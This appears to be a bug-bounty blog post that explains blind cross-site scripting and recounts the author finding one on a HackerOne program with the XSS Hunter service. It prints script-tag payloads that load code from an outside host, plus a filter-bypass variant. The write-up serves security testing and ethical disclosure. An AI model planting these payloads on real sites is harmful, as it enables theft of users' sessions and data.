BOOK THIS SPACE FOR AD
ARTICLE ADFirst of all, this blog is just for educational purpose. I will not be responsible if you mess anything up
Blind XSS is quite similar to stored Cross-Site Scripting attack where the input provided by the attacker is saved or stored by the web server and this stored input is reflected in various other applications which are linked with each other. It only triggers when the attacker’s input is stored by the web server in a database and executed as a malicious script in another part of the application or another application.
Attackers or Hackers inject the malicious script or payload ‘blindly’ on some web pages without having any assurance that it will be executing. Web pages that are likely to save their payload into the database are the most important carrier for Blind XSS attacks.
There are some tools available on the Internet to find blind xss
1. Xsshunter
2. Burp collaborator
3. Knowxss
Now I’m gonna explain you the easiest way to find Blind XSS
Let’s start
According to me Xsshunter is the easiest way to find blind XSS
XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.
Best part of Xsshunter is that whenever your script fires you will get dedicated mail from xsshunter that your payload is fired at that endpoint
Let’s start step by step
Navigate to https://xsshunter.com/appCreate your accountAfter creation go to payloadsChoose any payload and go to your targetUse your payload in any field that you think may be vulnerable to Blind xsswhenever your payload fires you will get emailNow you know the working of xsshunter and now I’m gonna explain how I found blind XSS in a target
Once upon a time when I was trying to find bugs on a private program in hackerone. I tried many ways but no luck
I was trying on discussion form but still no luck
then I used one payload from xsshunter
I used this payload "><script src=//yoursubdomain.xss.ht></script>
But still same result
then I just stopped testing for the day
Next day I tried again with same payload
I copied the payload from Xsshunter
created a new discussion in my target
used that payload
when I paste my payload I decided to check in a page source
Finally I found where the problem lies
there was a blocking for such type of payloads
new payload : ---"><script src=//yoursubdomain.xss.ht></script>---
I only use these -- in both ends
copied that payload and paste in the discussion
BOOM it worked
I got many mails from xsshunter
Now for the best part, ethically reported this bug and got rewarded
Yahoooooooo I got 300$ 🥳🥳🥳🥳🥳🥳🥳🥳